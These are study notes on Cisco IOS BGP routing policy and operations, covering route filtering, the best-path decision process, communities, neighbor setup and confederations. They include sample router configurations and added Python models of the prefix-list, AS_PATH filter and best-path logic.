# BGP Routing Policies


Route Filtering and Route Summarization

Tools used to filter BGP routes:

- Distribution lists
- Prefix lists
- AS_PATH filter lists
- Route maps
- aggregate-address command

The first four have the following in common:

- Can filter incoming or outgoing updates, per neighbor or per peer group.
- Examine the contents of the BGP update message (PAs and NLRI).
- If a filter is changed, a clear command is required. The clear command can use soft reconfiguration.

The tools differ in what they can match in the BGP update message:

- neighbor distribute-list _standard-acl_: Prefix with wildcard (wc) mask.
- neighbor distribute-list _extended-acl_: Prefix and prefix length with wc mask.
- neighbor prefix-list: Exact or "first N" bits of prefix plus range of prefix lengths.
- neighbor filter-list: All NLRI whose AS_PATHs are matched.
- neighbor route-map: Prefix, prefix length, AS_PATH and/or any other PA matchable within a BGP route map.

Filtering BGP updates based on NLRI

ip access-list extended lose-2
 deny ip host 22.2.2.0 host 255.255.255.0
 deny ip host 23.3.16.0 host 255.255.240.0
 permit ip any any
route-map rmap-lose-2 permit 10
 match ip address lose-2
router bgp 123
 neighbor 1.1.1.1 route-map rmap-lose-2 out
 neighbor 2.2.2.2 distribute-list lose-2 out
...
ip prefix-list prefix-lose-2 seq 5 deny 22.2.2.0/24
ip prefix-list prefix-lose-2 seq 10 deny 23.3.16.0/20
ip prefix-list prefix-lose-2 seq 15 permit 0.0.0.0/0 le 32
router bgp 123
 neighbor 9.9.9.9 prefix-list prefix-lose-2 out
! clear ip bgp 9.9.9.9 out or clear ip bgp * soft
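
The prefix-list matching rule above ("first N bits of the prefix plus a range of prefix lengths") modelled in Python, as an added example that is not part of the original notes. Entry, function and variable names are assumptions; PREFIX_LOSE_2 is the list from the configuration above and PREFIX_LOSE_2_STRICT is a constructed variant that also catches the longer subnets the exact-length entries let through.

```python
import ipaddress

# Added example (not from the original notes): how an IOS "ip prefix-list"
# is evaluated against one NLRI. An entry is (seq, action, prefix, ge, le).
# The NLRI matches when its first N bits equal the entry prefix (N = the
# entry's length) and its own length lies in the ge..le window: with
# neither ge nor le only length N matches, with only ge the window is
# ge..32, with only le it is N..le.


def entry_matches(entry, nlri):
    """True if the NLRI (e.g. '22.2.2.0/25') matches a single entry."""
    _seq, _action, prefix, ge, le = entry
    net = ipaddress.ip_network(prefix, strict=False)
    route = ipaddress.ip_network(nlri, strict=False)
    n = net.prefixlen
    # "first N bits" test: the NLRI must be the entry prefix or lie inside it
    if route.prefixlen < n or not route.subnet_of(net):
        return False
    if ge is None and le is None:
        lo, hi = n, n
    else:
        lo = n if ge is None else ge
        hi = route.max_prefixlen if le is None else le
    return lo <= route.prefixlen <= hi


def evaluate(prefix_list, nlri):
    """First matching entry (by sequence number) decides; no match is an
    implicit deny. Returns (permitted, matching_seq_or_None)."""
    for entry in sorted(prefix_list, key=lambda e: e[0]):
        if entry_matches(entry, nlri):
            return entry[1] == "permit", entry[0]
    return False, None


def filter_nlri(prefix_list, nlris):
    """Apply the list outbound: keep only the NLRI that are permitted."""
    return [n for n in nlris if evaluate(prefix_list, n)[0]]


# The prefix-lose-2 list from the configuration above, as data.
PREFIX_LOSE_2 = [
    (5, "deny", "22.2.2.0/24", None, None),
    (10, "deny", "23.3.16.0/20", None, None),
    (15, "permit", "0.0.0.0/0", None, 32),   # permit everything else
]

# Constructed variant: "le 32" on the deny entries also suppresses the
# more-specific subnets (22.2.2.0/25, 23.3.20.0/24, ...), which the
# exact-length entries above still let through to the permit at seq 15.
PREFIX_LOSE_2_STRICT = [
    (5, "deny", "22.2.2.0/24", None, 32),
    (10, "deny", "23.3.16.0/20", None, 32),
    (15, "permit", "0.0.0.0/0", None, 32),
]

if __name__ == "__main__":
    for nlri in ("22.2.2.0/24", "22.2.2.0/25", "23.3.20.0/24", "10.0.0.0/8"):
        print(nlri, evaluate(PREFIX_LOSE_2, nlri), evaluate(PREFIX_LOSE_2_STRICT, nlri))
```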

Soft Reconfiguration

clear ip bgp {* | _neighbor-address_ | _peer-group-name_} [soft [in | out]]

IOS supports soft reconfiguration for sent updates as is, but inbound updates need configuration.
The neighbor _neighbor-id_ soft-reconfiguration inbound command causes the router to keep a copy of the received updates.
BGP can then simply reapply the changed filtering policy to the stored updates without closing the neighbor connection.

Comparing BGP Prefix Lists, Distribute Lists and Route Maps

Distribute Lists for simple prefix matching (ACLs).
Prefix Lists for more flexible prefix matching.
The neighbor filter-list for AS_PATH filtering.
Route maps can be used for the same tasks; however, only route maps can provide the following two functions:

- Combine multiple logic: prefix/length, AS_PATH or other PAs
- Manipulate BGP PAs

Filtering Subnets of a Summary Using the aggregate-address Command

The filtering options on the aggregate-address command are:

- Filtering all component subnets by using the summary-only keyword.
- Advertising all component subnets by omitting the summary-only keyword.
- Advertising partial component subnets by referencing a route map with the suppress-map keyword.

ip access-list extended permit-1
 permit ip host 23.3.16.0 host 255.255.240.0
route-map suppress-1 permit 10
 match ip address permit-1
router bgp 123
 aggregate-address 23.0.0.0 255.0.0.0 as-set suppress-map suppress-1

Filtering BGP Updates by Matching the AS_PATH PA

ip as-path access-list _number_ {permit | deny} _regex_
neighbor _neighbor-id_ filter-list _as-path-filter-number_ {in | out}

NLRI whose AS_PATHs match with a deny action are filtered.

The BGP AS_PATH and AS_PATH Segment Types

The AS_PATH segment types:

- AS_SEQ: Ordered list of ASNs, separated using spaces and non-enclosed.
- AS_SET: Unordered list of ASNs, separated using commas and enclosed using braces.
- AS_CONFED_SEQ: Ordered list of confederation ASNs, separated using spaces and enclosed using parentheses.
- AS_CONFED_SET: Unordered list of confederation ASNs, separated using commas and enclosed using braces.

Using Regular Expressions to Match AS_PATH

The logic:

- Line-by-line search for a matching AS_PATH regex.
- A permit action does not filter the NLRI.
- A deny action filters the NLRI.
- Any NLRI not matched is filtered.

Regex metacharacters:

^ Start of line.
$ End of line.
| Logical OR applied between the preceding and succeeding characters
_ Any delimiter: blank, comma, start of line or end of line.
. Any single character.
? Zero or one instance of the preceding character.
* Zero or more instances of the preceding character.
+ One or more instances of the preceding character.
(string) Parentheses combine the enclosed string into a single entity when used with ?, * or +.
[string] Wildcard for which any of the single characters in the string can be used to match that position.

Example: Matching AS_PATHs Using AS_PATH Filters

- show ip bgp neighbor _neighbor-id_ advertised-routes displays the routes sent.
- show ip bgp neighbor _neighbor-id_ received-routes displays the routes received from a neighbor.
- Output filter lists are applied before the router adds its own ASN to the AS_PATH.
- show ip bgp regexp _expression_ tests the regex. The regexp option is not allowed with received-routes or advertised-routes.
- AS_PATH filter list can also be referenced in a route map using match as-path _list-number_.
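
The filter-list logic of the last two sections (line-by-line search, permit keeps, deny drops, implicit deny, and the _ delimiter metacharacter) as an added Python example that is not part of the original notes. Function names and the BGP table are assumptions; the table is constructed. It goes one step beyond the notes' definition of _ in that IOS also treats the AS_SET braces and confederation parentheses as delimiters, which is what makes _45_ match an ASN inside an AS_SET.

```python
import re

# Added example (not from the original notes): an IOS "ip as-path
# access-list" evaluated as a neighbor filter-list. The regex rules from
# the notes map onto Python's re module except "_", the Cisco delimiter
# metacharacter: blank, comma, start or end of line (IOS also counts the
# AS_SET braces and confederation parentheses, included here). AS_PATHs
# are written as "show ip bgp" prints them: AS_SEQ ASNs separated by
# spaces, an AS_SET in braces with commas.

DELIMITER = r"(?:^|$|[ ,{}()])"


def cisco_regex_to_python(regex):
    """Translate the IOS AS_PATH regex dialect into a Python pattern."""
    return regex.replace("_", DELIMITER)


def as_path_matches(regex, as_path):
    """Equivalent of testing one AS_PATH with 'show ip bgp regexp'."""
    return re.search(cisco_regex_to_python(regex), as_path) is not None


def filter_list_permits(acl, as_path):
    """Line-by-line search; the first matching line decides. A permit
    keeps the NLRI, a deny filters it, and an NLRI matching no line is
    filtered (implicit deny). acl is a list of (action, regex).
    Returns (permitted, index_of_matching_line_or_None)."""
    for index, (action, regex) in enumerate(acl):
        if as_path_matches(regex, as_path):
            return action == "permit", index
    return False, None


def apply_filter_list(acl, bgp_table):
    """Outbound filter over {nlri: as_path}: what survives is what
    'show ip bgp neighbor ... advertised-routes' would list (the filter
    runs before the local ASN is prepended)."""
    return {nlri: path for nlri, path in bgp_table.items()
            if filter_list_permits(acl, path)[0]}


# Constructed BGP table (not real routes) as seen on a router in AS 123.
BGP_TABLE = {
    "11.0.0.0/8": "",              # locally originated: empty AS_PATH
    "21.0.0.0/8": "45",
    "31.0.0.0/8": "45 678",
    "41.0.0.0/8": "678 145",       # 145 is not 45: "_45_" must not match
    "51.0.0.0/8": "678 {45,145}",  # summary carrying an AS_SET
}

# Typical customer policy: advertise only locally originated routes so
# the AS never becomes a transit AS.
ONLY_LOCAL = [("permit", "^$")]
# Drop anything that passed through AS 45, keep the rest.
NO_AS45 = [("deny", "_45_"), ("permit", ".*")]
# Only routes received directly from AS 678.
FROM_678 = [("permit", "^678_")]

if __name__ == "__main__":
    for name, acl in (("ONLY_LOCAL", ONLY_LOCAL), ("NO_AS45", NO_AS45),
                      ("FROM_678", FROM_678)):
        print(name, sorted(apply_filter_list(acl, BGP_TABLE)))
```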

The BGP Decision Process

0. Is the NEXT_HOP reachable?
1. Highest administrative weight: Local and Cisco-proprietary feature.
2. Highest LOCAL_PREF PA: Well-known discretionary PA. Distributed inside the AS only. Used to choose the same exit point for particular NLRI.
3. Locally injected routes.
4. Shortest AS_PATH length: Treats an AS_SET as one ASN and counts each ASN in the AS_SEQ as one. Ignored if bgp bestpath as-path ignore command is configured.
5. ORIGIN PA: (i) routes are preferred over (e) routes, which are preferred over (?) routes.
6. Smallest Multi-Exit Discriminator (MED) PA: Tells a neighbor which of the peer connections is best for reaching particular NLRI.
7. Neighbor type: Prefer eBGP routes over iBGP.
8. IGP metric for reaching the NEXT_HOP: The lower the value, the better the route.

Mnemonic for steps 0 through 8: N WLLA OMNI (NEXT_HOP; Weight, LOCAL_PREF, Locally injected, AS_PATH; ORIGIN, MED, Neighbor type, IGP metric).

Three Final Tiebreaker Steps in the BGP Decision Process

9. Keep oldest eBGP route: This action reduces eBGP route flaps.
10. Choose smallest neighbor RID: Use the route whose next-hop router RID is the smallest. Needs the bgp bestpath compare-routerid command.
11. Smallest neighbor ID: Prefer the route advertised by the lowest neighbor ID.

Adding Multiple BGP Routes to the IP Routing Table

- If the best path for an NLRI is determined in steps 0 through 8, BGP adds only one route to the IP routing table.
- If the best path is determined after step 8, BGP considers placing multiple BGP routes into the IP routing table.
- Even if multiple BGP routes are added to the IP routing table, BGP still chooses only one route that will advertise to neighbors.

Step 0: NEXT_HOP Reachable

The router accepts a BGP route as best only if it can forward packets to the next-hop router.
The NEXT_HOP can be changed using neighbor _neighbor-id_ next-hop-self or neighbor _neighbor-id_ next-hop-unchanged.

Step 1: Administrative Weight

Two methods of configuring the weight:

neighbor _neighbor-id_ weight _weight_
neighbor _neighbor-id_ route-map _route-map_ [in | out]
set weight _weight_

Step 2: Highest Local Preference (LOCAL_PREF)

The default value is 100.

neighbor _neighbor-id_ route-map _route-map_ [in | out]
set local-preference _number_

Step 3: Choose Between Locally Injected Routes Based on ORIGIN PA

When the same NLRI is locally injected into BGP from multiple methods, pick the route with the better ORIGIN PA.

Step 4: Shortest AS_PATH

The typical logic requires a router to count the number of ASNs in the AS_SEQ and add 1 if an AS_SET exists.
AS_CONFED_SEQ and AS_CONFED_SET do not count at all in the calculation.

aggregate-address _network_ _mask_ [as-set]:

- If the component subnets have different AS_PATHs, the summary route has only the local AS in the AS_SEQ.
- Otherwise, the summary route contains the AS_SEQ from the component subnets with the local AS prepended.

neighbor remove-private-as:

- Private ASNs can be removed only at the point of sending an eBGP update.
- If the current AS_SEQ contains both private and public ASNs, the private ASNs will not be removed.

neighbor local-as [no-prepend]:

- Allows a router to use a different AS.
- With no-prepend, the router does not prepend any ASN.

Using a neighbor route-map, the route map can use set as-path prepend to prepend one or more ASNs to the AS_SEQ.
The bgp bestpath as-path ignore command removes the AS_PATH length step from the decision tree.

Step 5: Best ORIGIN PA

BGP routing policies may set the ORIGIN code explicitly by using the set origin route map subcommand.

Step 6: Smallest Multi-Exit Discriminator

Allows an AS to tell a neighboring AS the best way to forward packets into the first AS.
The default value is 0. Routes that carry no MED can instead be treated as having the worst MED by using the bgp bestpath med missing-as-worst subcommand.
Configured via neighbor route-map _route-map_ out, using set metric subcommand.
To consider the MED in all cases, even when the AS_PATH differs, use the bgp always-compare-med subcommand.
To enhance the MED logic, use the bgp deterministic-med command.

Step 7: Prefer Neighbor Type eBGP over iBGP

BGP uses this decision point when two or more enterprise routers connect to the same ISP.
Each enterprise router knows of one eBGP route to reach each prefix and one or more iBGP routes to the same prefix.

Step 8: Smallest IGP Metric to the NEXT_HOP

The router looks for the BGP route with the smallest IGP metric to reach the NEXT_HOP IP address.

Step 9: Lowest BGP router ID of Advertising Router

Pick the route with the lowest RID:

- Examine eBGP routes first and after, the iBGP routes.
- If the existing best route is an eBGP route, do not replace it, even if the new route has a smaller RID. This behavior can be changed by configuring the bgp bestpath compare-routerid command.
- If the existing best route is an iBGP route, the decision is based on the lowest RID.

Step 10: Lowest Neighbor ID

If step 9 does not break the tie, then the router has at least two neighbor commands that point to the same router.
The router picks the routes with the lowest neighbor IP address.
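
The whole decision process, steps 0 through the final tiebreakers, as an added Python example that is not part of the original notes. Route fields, function names and the two sample candidates are assumptions; the step order and the tie rules (AS_SET counted as one ASN, confederation segments not counted, MED compared only within one neighboring AS unless always-compare-med, oldest eBGP route kept unless compare-routerid) follow the notes, numbered as in the tiebreaker list (9 oldest, 10 lowest RID, 11 lowest neighbor address).

```python
from dataclasses import dataclass
from typing import List, Tuple

# Added example, not from the original notes: the best-path decision
# process as an elimination over the candidate routes for one NLRI.
# Step numbers follow the tiebreaker list above (9 keep the oldest eBGP
# route, 10 lowest neighbor RID, 11 lowest neighbor address).

ORIGIN_RANK = {"i": 0, "e": 1, "?": 2}   # (i) beats (e) beats (?)


@dataclass
class Route:
    nlri: str
    neighbor_addr: str
    neighbor_rid: str
    # AS_PATH segments: ("seq", [...]), ("set", [...]), ("confed_seq", [...])
    as_path: List[Tuple[str, List[int]]]
    ebgp: bool = True
    next_hop_reachable: bool = True
    weight: int = 0
    local_pref: int = 100
    locally_injected: bool = False
    origin: str = "i"
    med: int = 0
    igp_metric: int = 0
    received_order: int = 0   # lower = received earlier (older route)


def as_path_length(segments):
    """Each ASN in an AS_SEQ counts one, a whole AS_SET counts one,
    AS_CONFED_SEQ and AS_CONFED_SET do not count at all."""
    total = 0
    for kind, asns in segments:
        if kind == "seq":
            total += len(asns)
        elif kind == "set":
            total += 1
    return total


def adjacent_asn(route):
    """First ASN of the AS_SEQ: the neighboring AS the route came from."""
    for kind, asns in route.as_path:
        if kind == "seq" and asns:
            return asns[0]
    return None   # locally originated or empty AS_PATH


def ip_key(addr):
    return tuple(int(octet) for octet in addr.split("."))


def best_path(routes, as_path_ignore=False, always_compare_med=False,
              compare_routerid=False):
    """Return (best_route, deciding_step). A decision at steps 0-8 installs
    a single route; 9-11 is where maximum-paths may install several.
    Returns (None, 0) when no candidate has a reachable NEXT_HOP."""
    cands = [r for r in routes if r.next_hop_reachable]          # step 0
    if not cands:
        return None, 0
    if len(cands) == 1:
        return cands[0], 0
    # (step, key where lower is better, enabled(candidates))
    steps = [
        (1, lambda r: -r.weight, lambda c: True),
        (2, lambda r: -r.local_pref, lambda c: True),
        (3, lambda r: not r.locally_injected, lambda c: True),
        (4, lambda r: as_path_length(r.as_path), lambda c: not as_path_ignore),
        (5, lambda r: ORIGIN_RANK[r.origin], lambda c: True),
        # MED is compared only between routes from the same neighboring AS
        # unless bgp always-compare-med is set (simplified: the step is
        # skipped when the remaining candidates span several ASes).
        (6, lambda r: r.med,
         lambda c: always_compare_med or len({adjacent_asn(r) for r in c}) == 1),
        (7, lambda r: not r.ebgp, lambda c: True),
        (8, lambda r: r.igp_metric, lambda c: True),
        # Keep the oldest eBGP route unless bgp bestpath compare-routerid.
        (9, lambda r: r.received_order,
         lambda c: not compare_routerid and all(r.ebgp for r in c)),
        (10, lambda r: ip_key(r.neighbor_rid), lambda c: True),
        (11, lambda r: ip_key(r.neighbor_addr), lambda c: True),
    ]
    for step, key, enabled in steps:
        if not enabled(cands):
            continue
        best = min(key(r) for r in cands)
        cands = [r for r in cands if key(r) == best]
        if len(cands) == 1:
            return cands[0], step
    return cands[0], 11   # identical on every criterion


# Constructed candidates for 10.0.0.0/8 from two neighboring ASes (not real).
VIA_45 = Route("10.0.0.0/8", "10.1.1.45", "9.9.9.9", [("seq", [45, 11])],
               med=50, received_order=0)
VIA_678 = Route("10.0.0.0/8", "10.1.1.67", "6.6.6.6", [("seq", [678, 11])],
                med=10, received_order=1)
```

With the two sample candidates, best_path([VIA_45, VIA_678]) skips the MED step (different neighboring ASes) and keeps the older route at step 9; always_compare_med=True decides at step 6 and compare_routerid=True at step 10.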

The BGP maximum-paths Command

BGP defaults the maximum-paths to 1.
However, BGP will consider adding multiple entries to the IP routing table under certain conditions.
For eBGP routes:

1. BGP reaches step 9 or 10 to determine the best route.
2. The maximum-paths _number_ is configured to something larger than 1.
3. Only eBGP routes whose adjacent ASNs are the same as the best route are considered as candidates.
4. If there are more candidates than the allowed ones, the tiebreakers of step 9 and 10 determine which ones to use.

For iBGP routes:

1. Same rule as eBGP rule 1.
2. The maximum-paths ibgp _number_ is configured to something larger than 1.
3. Only iBGP routes with differing NEXT_HOP are considered as candidates.
4. Same rule as eBGP rule 4.

The maximum-paths eibgp _number_ applies to both iBGP and eBGP routes, but only when MPLS is in use.

BGP communities

They allow routers in one AS to communicate policy information to routers that are one or more ASes distant (optional transitive).

router bgp 4
 neighbor 10.1.34.3 send-community both
 neighbor 10.1.34.3 route-map comm out
ip prefix-list 11 seq 5 permit 11.0.0.0/8
ip prefix-list 21 seq 5 permit 21.0.0.0/8
route-map comm permit 10
 match ip address prefix-list 11
 set community 1
route-map comm permit 20
 match ip address prefix-list 21
 set community 2
route-map comm permit 30
!
router bgp 123
 neighbor 10.1.34.4 route-map react-to-comm in
ip community-list 1 permit 1
ip community-list 2 permit 2
route-map react-to-comm permit 10
 match community 1
 set local-preference 300
route-map react-to-comm permit 20
 match community 2
 set local-preference 200
route-map react-to-comm permit 30

Matching COMMUNITY with Community Lists

The COMMUNITY PA has two representations of 32 bits:

- Original Cisco format: decimal value (32 bits). Default format.
- New RFC format: AA:NN (16 bits:16 bits). ip bgp-community new-format.

set community 10 20 30 creates a COMMUNITY with all three values and replaces any existing COMMUNITY.
set community 10 20 30 additive adds the values to the existing COMMUNITY string.

Standard community lists use numbers between 1 and 99, can match multiple communities in a single command, but do not support regexp.
Extended community lists use numbers between 100 and 199, can match multiple communities in a single command, and support regexp.

Removing COMMUNITY Values

Removing the entire COMMUNITY is relatively simple using the set community none command in a route-map.
To remove individual COMMUNITY strings use the set comm-list _number_ delete command.

Filtering NLRI Using Special COMMUNITY Values

match community {_standard_ | _extended_ | _name_ [exact]}

BGP includes reserved values for the COMMUNITY PA that allow route filtering but with less effort than is required with community lists and route maps:

- NO_EXPORT (value FFFF:FF01): Do not advertise outside this AS.
- NO_ADVERT (value FFFF:FF02): Do not advertise to any other peer.
- LOCAL_AS or NO_EXPORT_SUBCONFED (value FFFF:FF03): Do not advertise outside the local confederation sub-AS.
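
The COMMUNITY material of the last four sections (the two representations, set community with and without additive, set community none, set comm-list delete, and the filtering effect of the three reserved values) as an added Python example that is not part of the original notes. Function names and the peer-kind labels are assumptions.

```python
# Added example, not from the original notes: COMMUNITY values in both
# representations, the route-map operations set community, set community
# ... additive and set comm-list ... delete, and the advertisement rule
# the three reserved values impose. Function names are assumptions.

NO_EXPORT = 0xFFFFFF01      # FFFF:FF01 in the notes
NO_ADVERTISE = 0xFFFFFF02   # FFFF:FF02, NO_ADVERT in the notes
LOCAL_AS = 0xFFFFFF03       # FFFF:FF03, also NO_EXPORT_SUBCONFED


def to_new_format(value):
    """Decimal 32-bit community -> 'AA:NN' (ip bgp-community new-format)."""
    return f"{value >> 16}:{value & 0xFFFF}"


def from_new_format(text):
    """'AA:NN' -> decimal 32-bit community; a plain decimal is accepted too."""
    if ":" in text:
        aa, nn = (int(part) for part in text.split(":"))
        if not (0 <= aa <= 0xFFFF and 0 <= nn <= 0xFFFF):
            raise ValueError(f"community half out of range: {text}")
        return (aa << 16) | nn
    value = int(text)
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError(f"community out of range: {text}")
    return value


def set_community(existing, values, additive=False):
    """'set community v1 v2 ...' replaces the whole COMMUNITY; with
    'additive' the values are merged in; 'none' removes it entirely."""
    if values == ["none"]:
        return set()
    new = {from_new_format(v) for v in values}
    return (set(existing) | new) if additive else new


def comm_list_delete(existing, community_list):
    """'set comm-list N delete': drop each community a standard list permits."""
    remove = {from_new_format(v) for v in community_list}
    return {c for c in existing if c not in remove}


def may_advertise(communities, peer_kind):
    """Filtering effect of the reserved values. peer_kind is 'ibgp',
    'ebgp' (another AS) or 'confed' (another sub-AS of this confederation)."""
    if NO_ADVERTISE in communities:
        return False        # not to any peer at all
    if LOCAL_AS in communities and peer_kind in ("ebgp", "confed"):
        return False        # stays inside the local sub-AS
    if NO_EXPORT in communities and peer_kind == "ebgp":
        return False        # stays inside the AS (the whole confederation)
    return True


if __name__ == "__main__":
    print(to_new_format(NO_EXPORT), from_new_format("123:100"))
    print(set_community({1, 2}, ["10", "20", "30"], additive=True))
```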

# Fundamentals of BGP Operations


BGP Neighbor Summary

- TCP port: 179
- bgp timers _keepalive_ _holdtime_ and neighbor _ip-address_ timers _keepalive_ _holdtime_. Default to 60 and 180 seconds.
- Internal BGP neighbor: Neighbor is in the same AS.
- External BGP neighbor: Neighbor is in another AS.
- How is the BGP router ID (RID) determined? bgp router-id command, highest IP of an up/up loopback at start time of the BGP process, highest IP of another up/up interface at start time of the BGP process.
- How is the source IP selected to reach a neighbor? neighbor update-source, otherwise, uses the outgoing interface IP address.
- How is the destination IP selected to reach a neighbor? neighbor command.
- Auto-summary: Disabled by default.
- Neighbor authentication: MD5 only, using the neighbor _ip-address_ password _string_ command.

Internal BGP Neighbors

router bgp 123
 no synchronization
 bgp log-neighbor-changes
 no auto-summary
 bgp router-id 111.111.111.111
 neighbor 2.2.2.2 remote-as 123
 neighbor 2.2.2.2 update-source Loopback1
 neighbor 3.3.3.3 remote-as 123
 neighbor 3.3.3.3 password secret-pw
 neighbor 3.3.3.3 update-source Loopback1
router bgp 123
 no synchronization
 bgp log-neighbor-changes
 no auto-summary
 neighbor my-as peer-group
 neighbor my-as remote-as 123
 neighbor my-as update-source Loopback1
 neighbor 1.1.1.1 peer-group my-as
 neighbor 1.1.1.1 password secret-pw
 neighbor 2.2.2.2 peer-group my-as

The neighbor peer-group command simplifies the configuration and reduces some BGP processing and memory overhead.

External BGP Neighbors

router bgp 123
 neighbor 172.16.16.6 remote-as 678
router bgp 123
 neighbor 4.4.4.4 remote-as 45
 neighbor 4.4.4.4 update-source loopback1
 neighbor 4.4.4.4 ebgp-multihop 2

Checks Before Becoming BGP Neighbors

1. The router must receive a TCP connection with a source address configured in a neighbor command.
2. The router ASN must match the configured remote ASN (not true for confederation configurations).
3. The BGP RIDs must not be the same.
4. If configured, MD5 authentication must pass.

BGP Open messages include BGP timers. If they do not match, each router uses the lower of the values.

BGP Messages and Neighbor States

- Idle.
- Connect: Listen for TCP.
- Active: Listen for TCP, Initiate TCP.
- Open sent: Listen for TCP, Initiate TCP, TCP up, Open sent.
- Open confirm: Listen for TCP, Initiate TCP, TCP up, Open sent, Open received.
- Established: Listen for TCP, Initiate TCP, TCP up, Open sent, Open received, Neighbor up.

BGP Message Types

- Open: to establish a neighbor relationship and exchange basic parameters.
- Keepalive: to maintain the neighbor relationship.
- Update: to exchange routing information.
- Notification: to reset a neighbor relationship (used when BGP errors occur).

Purposefully Resetting BGP Peer Connections

The neighbor _ip-address_ shutdown and clear ip bgp _ip-address_ commands close the TCP connection to that neighbor and remove all entries in the BGP table learned from that neighbor.

BGP network Command

The BGP network router subcommand instructs the router to look for a route in its IP routing table and, if it exists, put the equivalent NLRI (Network Layer Reachability Information) into the local BGP table.
With this logic, connected routes, static routes, or IGP routes could be taken from the IP routing table and placed into the BGP table for later advertisement. When the router removes that route from its IP routing table, BGP then removes the NLRI from the BGP table and notifies its neighbors.
Key features:

- No mask is configured: Assumes the default classful mask.
- No auto-summary configured: An IP route must match both the prefix and the prefix length.
- Auto-summary configured: A classful network matches if any subnets exist.
- NEXT_HOP path attribute: Uses next hop of IP route.
- Maximum number injected by the network command into one BGP process: Limited by NVRAM and RAM.
- Purpose of the route-map option on the network command: To filter routes and manipulate path attributes.

A NEXT_HOP path attribute equal to 0.0.0.0 in the BGP table implies a connected route or null0 route in the IP routing table.

Redistributing from an IGP, Static, or Connected Route

router bgp 678
 redistribute static metric 9
 redistribute eigrp 6 route-map just-30-something

Impact of Auto-Summary on Redistributed Routes and the network Command

The logic is summarized as follows:

- redistribute: if any subnets of a classful network would be redistributed, do not redistribute them, but instead redistribute a route for the classful network.
- network: if a network command lists a classful network number, with the classful default mask or no mask, and any subnets of the classful network exist, inject a route for the classful network.

Manual Summaries and the AS_PATH Path Attribute

BGP manual summarization with the aggregate-address command differs from using the auto-summary command.
It can summarize based on any routes in the BGP table, creating a summary of any prefix length. It does not always suppress the advertisement of the component subnets, although it can be configured to do so.
The AS_PATH PA consists of up to four different components, called segments:

- AS_SEQ
- AS_SET
- AS_CONFED_SEQ
- AS_CONFED_SET

The aggregate-address command can create a summary route for which the AS_SEQ must be null when the component subnets of the summary route have differing AS_SEQ values.
The AS_SET segment solves the problem when the summary route has a null AS_SEQ. It holds an unordered list of all the ASNs.
The router suppresses the advertisement of all component subnets if the summary-only keyword is used, advertises all of them if the summary-only keyword is omitted, or advertises a subset if the suppress-map option is configured.

Router(config-router)# aggregate-address 23.0.0.0 255.0.0.0 summary-only as-set

Adding Default Routes to BGP

- Using the network 0.0.0.0 bgp subcommand. A route to 0.0.0.0/0 must exist in the local routing table via any means.
- Using the redistribute command and the default-information originate bgp subcommand.
- Using the neighbor _neighbor-id_ default-originate route-map _route-map-name_ bgp subcommand. Does not add a default route to the local BGP table. It causes the advertisement of a default to the specified neighbor. With the route-map option, the referenced route map examines the existence of a default route in the IP routing table.

ORIGIN Path Attribute

There are three BGP ORIGIN PA codes: IGP (i), EGP (e), Incomplete (?).
Routes redistributed into BGP use ORIGIN code ?.
Routes originated by EGP (Exterior Gateway Protocol), deprecated predecessor to BGP, use ORIGIN code e.
Routes created with the aggregate-address and:

- The as-set option is not used, use ORIGIN code i.
- The as-set option is used, and all component subnets use ORIGIN code i, use ORIGIN code i.
- The as-set option is used, and at least one subnet uses ORIGIN code ?, use ORIGIN code ?.

BGP Update Message

Each Update message has three main parts:

- The withdrawn routes field to inform its neighbors about failed routes.
- The PA field lists the PA for each route.
- The prefix and prefix length fields define each individual NLRI.

All the prefixes listed in a single update message share the same set of PA values.

Determining the Contents of Updates

BGP only advertises a route to reach a particular subnet (NLRI) if that route is considered to be the best route and if it is not matched by a deny clause in an outbound BGP filter:

- Choose the route with the shortest AS_PATH.
- Prefer an eBGP-learned route over an iBGP-learned route.
- Prefer the route with the lowest IGP metric to the NEXT_HOP. The NEXT_HOP has to be:
  - 0.0.0.0 (route injected on the local router), or
  - Reachable according to the IP routing table.
- Choose the iBGP-learned route with the lowest BGP RID of the advertising router.

When sending to an eBGP peer, the NEXT_HOP is changed to the same IP address used as the source IP address of the BGP Update message.
Can be changed via the command neighbor ... next-hop-unchanged
When sending to an iBGP peer, the default action is to leave the NEXT_HOP PA unchanged.
Can be changed via the command neighbor ... next-hop-self

Another important rule: do not advertise paths learned from iBGP neighbors to other iBGP neighbors.

Adding eBGP Routes to the IP Routing Table

The two requirements are:

- The eBGP route in the BGP table is the best route.
- The AD for eBGP routes must be lower than the ADs for other routing sources (IGP or static routes).

The AD for eBGP routes is 20, for iBGP routes is 200 and for local (locally injected) routes is 200.
These values can be overridden by using:

- distance bgp _external-distance_ _internal-distance_ _local-distance_ BGP subcommand, or
- distance _distance_ _ip-address_ _wildcard_ _access-list_ BGP subcommand (change AD for routes received by neighbor)

Backdoor Routes

Using network _network_ backdoor BGP subcommand, routers use the local AD (200) for that network and do not advertise it with BGP.

Adding iBGP Routes to the IP Routing Table

The same two eBGP requirements plus the concept of BGP synchronization.
With no synchronization, BGP uses the same logic for iBGP routes as it does for eBGP routes.
With synchronization, BGP does not consider an iBGP route as best unless the exact prefix was learned via IGP and is currently in the routing table.

Using Sync and Redistributing Routes

Redistribution solves the routing black-hole problem and sync solves the problem of advertising a black-hole route to another AS.
Sync does not work if OSPF RID and BGP RID do not match.

Disabling Sync and Using BGP on All Routers in an AS

A second method is to simply use BGP to advertise all BGP-learned prefixes to all routers in the AS.
The downside is the addition of iBGP neighbor connections between each pair of routers (performance and convergence time).
BGP needs the full mesh of iBGP peers because it does not advertise iBGP-learned routes to another iBGP peer.
BGP offers two alternatives: confederations and route reflectors.

Confederations

- Inside a sub-AS, full mesh is required.
- The confederation eBGP connections act like normal eBGP connections in that iBGP routes are advertised.
- The confederation eBGP connections act like normal eBGP connections regarding TTL (1 by default).
- The confederation eBGP connections act like iBGP connections in every other regard (NEXT_HOP is not changed by default).
- Confederation ASNs are not considered part of the length of the AS_PATH when a router chooses the best routes.
- Confederation routers remove the confederation ASNs from the AS_PATH in updates sent outside the AS.
- Confederation routers use the AS_CONFED_SEQ and AS_CONFED_SET segments of the AS_PATH PA.

Configuring Confederations

router bgp 65001
 no synchronization
 bgp router-id 111.111.111.111
 bgp confederation identifier 123
 bgp confederation peers 65023
 neighbor 2.2.2.2 remote-as 65023
 neighbor 2.2.2.2 ebgp-multihop 2
 neighbor 2.2.2.2 update-source loopback1
 neighbor 2.2.2.2 next-hop-self
 neighbor 172.16.16.6 remote-as 678
router bgp 65023
 no synchronization
 bgp confederation identifier 123
